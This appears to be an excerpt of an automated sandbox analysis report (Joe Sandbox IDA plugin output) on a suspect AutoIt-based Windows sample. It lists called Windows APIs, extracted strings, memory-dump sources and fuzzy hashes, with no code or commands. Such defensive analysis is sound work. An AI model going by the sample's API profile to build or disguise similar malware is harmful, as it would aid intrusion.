                                    • Instruction ID: 8731057b6890bfd28537abcecbbff4a36de92e5e617f177aac8fc402152f4d2f
                                    • Opcode Fuzzy Hash: 4dc0ee3b2f37021aaf56360915836baef455079c9c9f5a92ffbb544cd12996df
                                    • Instruction Fuzzy Hash: 21119A71581225BBDB258BA18889EEBFBADFB06794F10C62BF50596280D3706981C6F0
                                    APIs
                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • htons.WSOCK32(00000000,?,00000000), ref: 009DA88B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: htonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 3832099526-2422070025
                                    • Opcode ID: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                    • Instruction ID: fd4a273d6c8b46b6c93520ddff52aed17ce38869731d540d784be4b8b6e16cdf
                                    • Opcode Fuzzy Hash: b5c7dceb8066e1c71f984529bb9977942890f02d6ae0a135b72b13c03a85403f
                                    • Instruction Fuzzy Hash: B001D675640304ABCB11DFA4C856FA9B368EF44314F10882BF915973D1D771E812D752
                                    APIs
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 009BB7EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                    • Instruction ID: 09f3f347d836ed58154818a6fc86fc63458a84e7213978c2addf8ef667846987
                                    • Opcode Fuzzy Hash: 0907bc11a31f7ca73299fa0c4702a09d95d295a4591c1655245480670145c1f7
                                    • Instruction Fuzzy Hash: 7101D4B5641118ABCB04FBA4CD52AFE33ADBF85360B040A1DF462673D2EFB45908C7A0
                                    APIs
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 009BB6EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                    • Instruction ID: 885e0fb1ef1a48c4ce083ed8b4d8932c8120acd691fc5f4143d2d3a1c4faaa10
                                    • Opcode Fuzzy Hash: 5a510ed2646f0ce2c69b02458f385af35814a6eaf6fb8ba802226aef9f7a6e56
                                    • Instruction Fuzzy Hash: A10162B5A41108ABCB14FBA4CA53BFE73AD9F45354F10002DB502B32D2EBA45E1897B5
                                    APIs
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 009BB76C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                    • Instruction ID: 8beda26d8876d06cd25bf7d1f37209e99bd3dcf3d656a06b5305efcb8a8a8c74
                                    • Opcode Fuzzy Hash: 0bdc322aa504e5afe943d9fe1da5d38b453ce78739bdc410e2f35239e1b250c6
                                    • Instruction Fuzzy Hash: B30162B6641104BBCB14FBA4DA52BFE73AC9F45354F50001AB402B32D2EBA45E1987B5
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                    • Instruction ID: 5ab20bb47da1383560c7692a7d005378437d70a2ff66d4eae86dac505e9ef962
                                    • Opcode Fuzzy Hash: 183c3f18c17589a445c93d8e6370416463c3c0bd566fab9c39bfb11d09e1f036
                                    • Instruction Fuzzy Hash: 0EE09277A042282BDB10EAE5DC0AF87FBACAB91764F00001AB905E7081D760A60287D4
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 009BA63F
                                      • Part of subcall function 009A13F1: _doexit.LIBCMT ref: 009A13FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: d630177a759b87d257d405e496fc53c555c8a9c8001726fe811c415f56c25e9c
                                    • Instruction ID: a601cf1138cf05495354a901236fe116a817ae3e04cb9f6e20366c89c0cb76f5
                                    • Opcode Fuzzy Hash: d630177a759b87d257d405e496fc53c555c8a9c8001726fe811c415f56c25e9c
                                    • Instruction Fuzzy Hash: D3D05B323C432877D61436DC7C17FD5764C9B55B61F054416BB08D95C24DD2958142D9
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 009FACC0
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009FAEBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DirectoryFreeLibrarySystem
                                    • String ID: WIN_XPe
                                    • API String ID: 510247158-3257408948
                                    • Opcode ID: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                    • Instruction ID: a4f3aa5fcf26bd500cbd09d97fcecb7f274e17c8c544080d54b83c0b72349f9e
                                    • Opcode Fuzzy Hash: 037c90c4d08a1837efb46421645e44f6d5d870b93d87c5ad6901ccfe96544600
                                    • Instruction Fuzzy Hash: 1DE065B5C0014DDFCB11DBE9D944AFCF7BCAB48300F108082E196B2160CB345A45DF21
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86A2
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009E86B5
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                    • Instruction ID: 4beecda42c57ad4fd3529971aac125f65afcbdd04f3b4c4f97df618bc4a810a7
                                    • Opcode Fuzzy Hash: 24191f869a45c2edc510e3d6735042827c04f04874ff4e5dbcdb8f9475498890
                                    • Instruction Fuzzy Hash: EFD01233798318BBE768A7F09C4FFC67A18AF44B11F100819B749AA1D0C9E1E942CB54
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009E86E2
                                    • PostMessageW.USER32(00000000), ref: 009E86E9
                                      • Part of subcall function 009C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 009C7AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                    • Instruction ID: eb8b54abff5f1af58370302c5dfa56da5d7cb4f31458227ab19213a80e9423f5
                                    • Opcode Fuzzy Hash: a700d01a96f740e53bfa98cc601d97043d436147d35e52ae7720e0d31e2cae28
                                    • Instruction Fuzzy Hash: AED0C9327853187BE668A7F09C4BFC66A18AB44B11F100819B645AA1D0C9A1A9428A55